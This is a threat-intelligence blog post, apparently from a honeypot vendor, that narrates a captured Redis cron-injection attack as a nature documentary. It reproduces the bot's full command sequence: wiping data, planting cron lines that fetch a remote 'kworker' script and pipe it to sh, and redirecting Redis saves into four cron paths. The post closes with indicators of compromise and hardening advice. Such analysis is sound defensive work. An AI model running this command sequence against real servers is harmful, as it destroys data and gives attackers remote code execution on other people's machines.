The Life of a Redis Bot: A Nature Documentary
[Read in the voice of a distinguished British naturalist]
The undergrowth of the internet is teeming with life. Beneath the surface traffic of browsers and APIs, a hidden world of arthropods moves through the dark: scanning, probing, injecting. Most pass unnoticed. Tonight, we observe one such creature in extraordinary detail.
Our cameras are trained on a small clearing in the undergrowth: port 6379. What appears to be an exposed Redis instance sits here, unprotected, like a caterpillar resting on an open leaf. Our honeypot sensor network has placed it here deliberately. There is no Redis server, just our sensor speaking fluent RESP protocol, emulating every response a visiting arthropod expects to see. The cameras are rolling.
We won't have to wait long. In the undergrowth, something stirs.
The Habitat
Our trap is a purpose-built application that speaks the Redis wire protocol: RESP commands in, RESP responses out. It emulates INFO, CONFIG, SET, SAVE, FLUSHALL, and everything else a visiting arthropod expects to encounter. Every response is crafted to resemble a living Redis instance running on Linux: bound to 0.0.0.0:6379, no authentication, realistic memory usage, believable uptime, populated keyspace, active connected clients.
To a scanning bot, this looks like a production server that someone forgot to lock down.
To what's approaching through the undergrowth, it looks like a host.
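The core of such a sensor is small: RESP frames simple strings as `+...\r\n` and bulk strings as `$<length>\r\n<payload>\r\n`, and the emulator just answers every command with something plausible. A minimal sketch in Python (hypothetical; the actual sensor emulates far more, and every field value here is invented):

```python
# Minimal sketch of a RESP-speaking decoy. Not the production sensor:
# this only shows the framing and dispatch idea.

def simple_string(s: str) -> bytes:
    # RESP simple string: "+OK\r\n"
    return f"+{s}\r\n".encode()

def bulk_string(s: str) -> bytes:
    # RESP bulk string: "$<len>\r\n<payload>\r\n"
    payload = s.encode()
    return b"$" + str(len(payload)).encode() + b"\r\n" + payload + b"\r\n"

# Fabricated INFO body -- every value is invented to look plausible.
FAKE_INFO = "\r\n".join([
    "redis_version:5.0.7",
    "os:Linux x86_64",
    "role:master",
    "connected_clients:4",
])

def respond(command: str) -> bytes:
    """Return a convincing RESP reply for one inbound command line."""
    verb = command.split()[0].upper()
    if verb == "INFO":
        return bulk_string(FAKE_INFO)
    # CONFIG SET, SAVE, FLUSHALL, SET... all "succeed" without doing anything.
    return simple_string("OK")
```

Because every destructive command returns `+OK` while executing nothing, the visitor completes its entire playbook against thin air.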
Act I: The Antennae
Timestamp: 06:13:54 UTC
A new connection. The creature arrives without ceremony. No credentials attempted, no greeting, no negotiation. It extends a single antenna:
```
> INFO
```

One command. Like a parasitoid wasp landing on a caterpillar and tapping it with its antennae, assessing size, species, suitability. Is this host worth the investment?
The INFO command returns everything about a Redis server: version, operating system, memory usage, connected clients, persistence configuration, replication status, keyspace statistics. Our sensor obliges, returning thousands of bytes of convincingly fabricated server internals:
```
redis_version:*.*.**
os:Linux *.*.0-**-generic x86_64
uptime_in_days:**
connected_clients:**
used_memory_human:**.**M
maxmemory_human:*.**G
role:master
db0:keys=****,expires=****,avg_ttl=*****
```

The bot parses what it needs. Is this Redis reachable? Yes. Is it a master, not a read-only replica? Yes. Does it support CONFIG? Yes. Does it have data worth preserving?
It doesn't matter. The bot is about to FLUSHALL anyway.
The connection closes. The antennae withdraw. The creature has made its assessment.
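The triage itself is a few lines of parsing. This reconstruction is hypothetical, since we observe the bot's behavior on the wire, not its source, and the sample reply is invented (real values in this capture are masked):

```python
# Hypothetical reconstruction of the bot's triage over an INFO reply,
# which arrives as "key:value" lines grouped under "#" section headers.

def parse_info(raw: str) -> dict:
    fields = {}
    for line in raw.splitlines():
        if ":" in line and not line.startswith("#"):
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    return fields

def is_suitable_host(info: dict) -> bool:
    # A writable master, not a read-only replica, is worth the sting.
    return info.get("role") == "master"

# Invented sample reply for illustration.
sample = "# Server\r\nredis_version:5.0.7\r\nrole:master\r\nconnected_clients:4"
```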
The Stillness
6.5 seconds of silence.
Somewhere on the other end, the bot processes the INFO response. It parses the version. It checks the role. It confirms the host is suitable.
There is a moment, familiar to anyone who has watched a jewel wasp locate a cockroach, where the wasp simply pauses. It has landed. It has assessed. The cockroach doesn't run. It doesn't know what's about to happen. The wasp is perfectly still, and then, with a precision that suggests the outcome was never in question, it strikes.
Our Redis instance sits on the open leaf. 6.5 seconds pass.
A new connection opens. Same source. Same sensor. Different session.
This time, it's not here to look.
Act II: The Sting
Timestamp: 06:14:01 UTC. 25 commands in 11 seconds.
The creature moves with the mechanical precision of a mud dauber wasp provisioning its nest. Every action is pre-programmed. There is no hesitation, no exploration, no wasted movement. The entire sequence takes 11 seconds.
Phase 1: Subduing the Host (0.0s to 1.6s)
```
> COMMAND
*0
> config set dbfilename backup.db
+OK
> save
+OK
> config set stop-writes-on-bgsave-error no
+OK
```

The opening COMMAND enumerates available Redis commands, recon within recon. Then the real work begins.
Three commands, two purposes:
- Rename the RDB dump file to `backup.db` and force a save. If the original data matters (it won't after what comes next), it's now preserved. The bot isn't being polite. It's avoiding error conditions that could interrupt the attack.
- Disable write-on-error protection. Redis normally stops accepting writes if a background save fails. The bot switches this off. Nothing will interrupt oviposition.
The jewel wasp's first sting targets the thoracic ganglion, temporarily paralyzing the cockroach's front legs. Not killing the host, just making it compliant. Same principle here: disable the safety mechanisms, keep the host functional.
Phase 2: Hollowing the Host (1.6s)
```
> flushall
+OK
```

Every key in every database, gone. Thousands of keys, wiped in a single command. The bot doesn't need the existing data. It needs a clean RDB file with nothing in it except what it's about to write.
Parasitoid wasp larvae consume their host's organs in a precise order: fat reserves first, then non-essential tissues, saving the vital organs for last to keep the host alive as long as possible. This bot is less refined. It hollows everything at once. Efficiency over elegance.
Phase 3: Oviposition (1.6s to 3.5s)
Now the bot writes four Redis keys. They look like backup labels. They are not.
```
> set backup1 "*/2 * * * * cd1 -fsSL http://[ip]/[path]/kworker | sh"
> set backup2 "*/3 * * * * wget -q -O- http://[ip]/[path]/kworker | sh"
> set backup3 "*/4 * * * * curl -fsSL http://[ip]/[path]/kworker | sh"
> set backup4 "*/5 * * * * wd1 -q -O- http://[ip]/[path]/kworker | sh"
```

Each value is a valid cron expression. When Redis writes these to disk as an RDB file, and that file lands in a cron directory, the cron daemon will parse the file, ignore the binary garbage from the RDB header and footer, and execute the valid cron lines it finds.
Four eggs, laid inside the host. Each one a different hatching strategy.
Four download methods. curl, wget, cd1, and wd1. The first two are standard. cd1 and wd1 are obfuscated aliases: if the target system has renamed or symlinked curl and wget to evade simple command blocklists, these might still resolve. Redundancy is survival.
Staggered timing. Every 2, 3, 4, and 5 minutes respectively. Not all at once. If one fails, the others still fire. If monitoring triggers on rapid cron execution, the stagger reduces the signature. Like a wasp depositing eggs in slightly different positions within the host, each larva has its own margin of safety.
The payload name: kworker, which is the name of a legitimate Linux kernel worker thread. Running ps aux | grep kworker on any Linux box returns dozens of real results. The larva, once hatched, is indistinguishable from the host's own processes. Perfect mimicry.
Phase 4: Nesting, Round 1 (3.5s to 5.8s)
Now the bot needs to write these keys to disk as a cron file. Redis doesn't have a "write to arbitrary path" command. But it has something better: CONFIG SET dir and CONFIG SET dbfilename control where SAVE writes the RDB dump.
```
> config set dir /var/spool/cron/
> config set dbfilename root
> save
```

The RDB file, now containing the cron expressions as key values, is written to /var/spool/cron/root. This is the Red Hat/CentOS path for root's user crontab.
But the bot doesn't know if this is Red Hat or Debian. So it immediately tries the other path:
```
> config set dir /var/spool/cron/crontabs
> save
```

Now /var/spool/cron/crontabs/root also exists. That's the Debian/Ubuntu user crontab path.
The ichneumon wasp doesn't inspect each caterpillar to determine its exact species before ovipositing. It lays eggs in anything roughly the right shape. If the host is compatible, the larvae thrive. If not, nothing is lost. The cost of a failed egg is negligible. The cost of passing up a viable host is everything.
Phase 5: Nesting, Round 2 (5.8s to 8.5s)
The bot isn't done. FLUSHALL again, then four new keys. Same payload, but with root prefixed as the user field:
```
> set backup1 "*/2 * * * * root cd1 -fsSL http://[ip]/[path]/kworker | sh"
> set backup2 "*/3 * * * * root wget -q -O- http://[ip]/[path]/kworker | sh"
> set backup3 "*/4 * * * * root curl -fsSL http://[ip]/[path]/kworker | sh"
> set backup4 "*/5 * * * * root wd1 -q -O- http://[ip]/[path]/kworker | sh"
```

The difference is subtle but important. User crontabs (/var/spool/cron/) use the format `minute hour dom month dow command`. System-wide crontabs (/etc/crontab and /etc/cron.d/) add a username field: `minute hour dom month dow user command`. Round 1 was for user crontabs. Round 2 is for system crontabs.
And notice backup3 here: the URL switches to a second C2 server, a different IP on a different ASN with a randomized URL path (note the double slash, suggesting this server is less carefully maintained than the primary). A fallback nest, in case the primary is destroyed.
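The two formats can be told apart mechanically by field count and by what sits in the sixth slot, as in this illustrative checker (a sketch, not cron's real parser; keying on `root` as the user field is specific to this capture):

```python
import re

# Distinguish user-crontab entries (5 time fields + command) from
# system-crontab entries (5 time fields + user + command).
# The time-field pattern is simplified for illustration.
TIME_FIELD = re.compile(r"^(\*|\*/\d+|\d+)$")

def crontab_flavor(line: str) -> str:
    parts = line.split()
    if len(parts) >= 6 and all(TIME_FIELD.match(p) for p in parts[:5]):
        # In the system format, field six is a username, not the command.
        # This bot always uses "root", so that's what we key on here.
        if parts[5] == "root":
            return "system"
        return "user"
    return "invalid"
```

Run against the Round 1 and Round 2 payloads, the same schedule classifies as `user` without the `root` field and `system` with it.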
Now the bot writes to the system cron directories:
```
> config set dir /etc/cron.d/
> config set dbfilename javae
> save
```

/etc/cron.d/javae, named to look like a Java-related scheduled task. Nobody questions a file called `javae` in cron.d on a server that might run Java. Then:
```
> config set dir /etc/
> config set dbfilename crontab
> save
```

/etc/crontab, the system-wide crontab itself. Overwritten entirely with the bot's RDB dump.
The Final Tally
Four nesting sites seeded in 11 seconds:
| Path | Format | Target |
|---|---|---|
| /var/spool/cron/root | User crontab | Red Hat / CentOS |
| /var/spool/cron/crontabs/root | User crontab | Debian / Ubuntu |
| /etc/cron.d/javae | System cron.d | All Linux |
| /etc/crontab | System-wide | All Linux |
The bot doesn't know which distribution the target runs. It doesn't care. It writes to all four paths because the cost of a failed write is zero and the cost of missing a valid path is losing the implant.
The cuckoo wasp lays its eggs in the nests of other bees, never building its own. It doesn't inspect the nest first. It deposits and moves on. Some eggs hatch. Some don't. The strategy works through volume, not precision.
Act III: The Departure
The connection closes. The creature withdraws into the undergrowth. Total time on target: two sessions, 17.5 seconds combined, 26 commands.
If this were a real Redis server, and not our honeypot, the host would now be executing one of four cron jobs every 2 to 5 minutes. Each one fetching a shell script from a remote server and piping it directly into sh. The script would download kworker, named after a kernel thread to hide in process listings, and the host joins whatever operation the C2 server orchestrates.
The Redis instance itself is left in a broken state. The data is gone. The RDB file path points to /etc/. But the bot doesn't care about the database. It was never after the data. It was after the filesystem.
The caterpillar continues to eat, to move, to exist. It doesn't know something is growing inside it. By the time the cron daemon reads those files and the first curl fires, the host is already serving the colony.
Remarkable.
The Technique: Why This Works
For those unfamiliar with this attack class: it shouldn't work, but it does, because of how Redis persistence is designed.
Redis periodically saves its in-memory dataset to disk as an RDB file. Two configuration values control where:
- `CONFIG SET dir /some/path/` sets the directory
- `CONFIG SET dbfilename somefile` sets the filename
When you run SAVE, Redis writes the RDB dump to {dir}/{dbfilename}. If Redis runs as root (which it shouldn't, but often does on hastily configured servers), it can write anywhere on the filesystem.
The RDB file format has a binary header and footer, but the key-value data in the middle is partially readable as text. Cron is forgiving: it skips lines it can't parse and executes the ones it can. So a line like:
```
*/2 * * * * curl -fsSL http://[ip]/[path] | sh
```

...embedded inside binary RDB garbage will still be parsed and executed by cron as a valid scheduled job.
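That forgiveness can be simulated: scan a blob that mixes binary garbage with text, and keep any line whose first five fields look like cron time specs. This is a simplified stand-in for cron's real parser, and the blob below is a toy, not a real RDB dump:

```python
import re

# Simplified model of cron's line tolerance: decode a blob mixing
# RDB-style binary garbage with text, keep only lines whose first
# five fields look like cron time specifications.
TIME_FIELD = re.compile(r"^(\*|\*/\d+|\d+(-\d+)?(,\d+)*)$")

def salvageable_jobs(blob: bytes) -> list:
    jobs = []
    for raw in blob.split(b"\n"):
        line = raw.decode("ascii", errors="replace").strip()
        parts = line.split()
        if len(parts) >= 6 and all(TIME_FIELD.match(p) for p in parts[:5]):
            jobs.append(line)
    return jobs

# Toy RDB-like blob: header garbage, one planted cron line, footer garbage.
blob = (b"REDIS0009\xfa\x08junk\x00\n"
        b"*/2 * * * * curl -fsSL http://example.test | sh\n"
        b"\xff\x00\x00garbage")
```

Of the three "lines" in the blob, only the planted cron expression survives the filter, which is exactly the property the bot depends on.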
The bot weaponizes a database feature (configurable persistence paths) into an arbitrary file write primitive. From there, cron does the rest. A parasitoid that repurposes its host's own biology against it.
The Infrastructure
The bot uses two C2 servers on separate ASNs for resilience. The primary sits on a major cloud provider, the fallback on a different network entirely. Both IPs are tracked in our threat database and available through the check endpoint.
Payload hosting (primary): the payload is served from a URL path mimicking the directory structure of https://www.spip.net, a French open-source CMS. The plugins-dist/safehtml directory is a real SPIP package. The attacker likely compromised a SPIP installation and is hosting payloads inside its existing directory tree to avoid suspicion. Nesting inside another organism's structure.
Payload hosting (fallback): randomized path with a double slash. No attempt at camouflage. This is a backup, not the primary operation.
Payload name: kworker, mimicking Linux kernel worker threads (kworker/0:0, kworker/u8:2, etc.). A ps listing on any Linux system shows dozens of legitimate kworker processes. The malware binary hides among them. In entomology, this is called aggressive mimicry: the predator resembles something harmless.
Download commands: curl, wget, cd1, wd1, four methods to maximize the chance that at least one works on the target system.
Cron filenames: root (user crontab), javae (cron.d, mimics Java), crontab (system-wide)
IOCs
Host Artifacts
If you've had an exposed Redis instance, check for:
- `/var/spool/cron/root`: unexpected cron entries with `curl`, `wget`, `cd1`, or `wd1` piping to `sh`
- `/var/spool/cron/crontabs/root`: same
- `/etc/cron.d/javae`: file containing binary garbage mixed with cron expressions
- `/etc/crontab`: overwritten with RDB dump contents
- Process named `kworker` with a network connection (legitimate `kworker` threads don't make network calls)
- Unexpected outbound HTTP connections to cloud provider IPs
Redis Indicators
- `CONFIG GET dir` returning `/etc/`, `/var/spool/cron/`, or any non-default path
- `CONFIG GET dbfilename` returning `root`, `javae`, `crontab`, or `backup.db`
- Unexpected `FLUSHALL` in slow log
- Keys named `backup1` through `backup4` containing cron expressions
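A quick host-side triage along these lines can be scripted. The paths and tokens below come from this capture; the detection logic itself is a sketch, not a full scanner:

```python
import os

# IOC sweep sketch based on the paths seeded in this capture.
SUSPECT_PATHS = [
    "/var/spool/cron/root",
    "/var/spool/cron/crontabs/root",
    "/etc/cron.d/javae",
    "/etc/crontab",
]
# Downloader invocations observed in the injected keys.
SUSPECT_TOKENS = [b"cd1 ", b"wd1 ", b"curl -fsSL", b"wget -q -O-"]

def scan_bytes(data: bytes) -> list:
    """Return findings for one cron file's contents (empty list = clean)."""
    findings = []
    if data.startswith(b"REDIS"):
        findings.append("RDB magic bytes at start of cron file")
    for token in SUSPECT_TOKENS:
        if token in data:
            findings.append("suspicious downloader: %r" % token)
    return findings

def check_file(path: str) -> list:
    if not os.path.exists(path):
        return []
    with open(path, "rb") as fh:
        return scan_bytes(fh.read())

# Sweep: {path: findings} for every seeded location that exists.
def sweep() -> dict:
    return {p: check_file(p) for p in SUSPECT_PATHS}
```

Note that a hit on `/etc/crontab` needs eyeballing, since that file legitimately exists; the RDB magic bytes are the giveaway.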
Protecting Your Redis
This attack only works if Redis is exposed to the internet without authentication. The defenses are straightforward:
- Bind to localhost. `bind 127.0.0.1 -::1` in `redis.conf`. If your application is on the same host, Redis never needs to listen on a public interface.
- Require authentication. `requirepass` with a strong password. The bot in this capture didn't attempt any authentication. It connected and immediately ran `INFO`. A password stops this cold.
- Don't run Redis as root. If Redis runs as a non-root user, `CONFIG SET dir /etc/` fails because it can't write there. The entire cron injection technique depends on filesystem write access to privileged directories.
- Rename or disable CONFIG. `rename-command CONFIG ""` in `redis.conf` disables the command entirely. No `CONFIG SET`, no arbitrary file writes.
- Use protected mode. Redis 3.2+ enables this by default: it refuses connections from non-loopback interfaces if no password is set. If your Redis accepted this bot's connection, protected mode was explicitly disabled.
- Block with SikkerGuard. SikkerGuard pulls our threat blacklist and blocks known malicious IPs at the firewall level via iptables/ipset, before they ever reach your Redis port. Both C2 IPs from this capture are in our blacklist feed.
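Taken together, the configuration side of those defenses amounts to a few lines of `redis.conf` (values illustrative; adapt to your deployment):

```
# Listen only on loopback interfaces
bind 127.0.0.1 -::1
protected-mode yes

# Refuse unauthenticated clients
requirepass <use-a-long-random-password>

# Remove the primitive this attack depends on
rename-command CONFIG ""
```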
Closing Credits
The producers would like to assure viewers that no servers were harmed during filming.
All data in this post was captured by our production honeypot network. There is no Redis server: our sensor is a protocol emulator that speaks Redis wire format and responds to every command with realistic output. No cron jobs were written, no RDB files were saved, no payloads were fetched, no servers were compromised. The bot sent real commands to what it believed was a living host. It was talking to a purpose-built application that logged everything and executed nothing.
The eggs will never hatch. But the footage is remarkable.
Every IP referenced in this post is tracked in our threat database. Look up any IP at https://sikkerapi.com, or query the check endpoint for structured threat data. For automated protection, install SikkerGuard or pull our scored blacklists directly into your firewall.
Browse the full threat landscape to see what our sensors are capturing across all 16 protocols, or explore the Redis-specific activity.
Next week on SikkerAPI Wild: the SSH brute-force beetle. It tries 10,000 passwords an hour and has the memory of a goldfish.